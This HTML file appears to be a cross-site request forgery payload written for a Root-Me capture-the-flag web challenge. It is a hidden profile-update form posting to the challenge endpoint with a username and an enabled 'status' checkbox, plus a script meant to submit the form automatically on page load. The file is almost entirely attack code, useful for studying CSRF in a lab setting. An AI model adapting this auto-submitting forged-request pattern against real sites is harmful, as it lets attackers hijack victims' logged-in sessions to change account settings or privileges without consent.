<!DOCTYPE html>
<html>
    <head>
        <title>robechon Page</title>
    </head>
    <body>
        <div>
            <fieldset>
                <legend>Update Profile</legend>
                <form name="myForm" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile" method="post" enctype="multipart/form-data">
                    <div>
                        <label>Username:</label>
                        <input type="text" name="username" value="robin">
                    </div>
                    <div>
                        <label>Status:</label>
                        <input type="checkbox" name="status" value="on">
                    </div>
                </form>
            </fieldset>
        </div>
        <script type="text/javascript">
            document.getElementById("myForm").onload = function() {
                csrf()
            };

            function csrf() {
                document.myForm.submit();
            }
        </script>
    </body>
</html>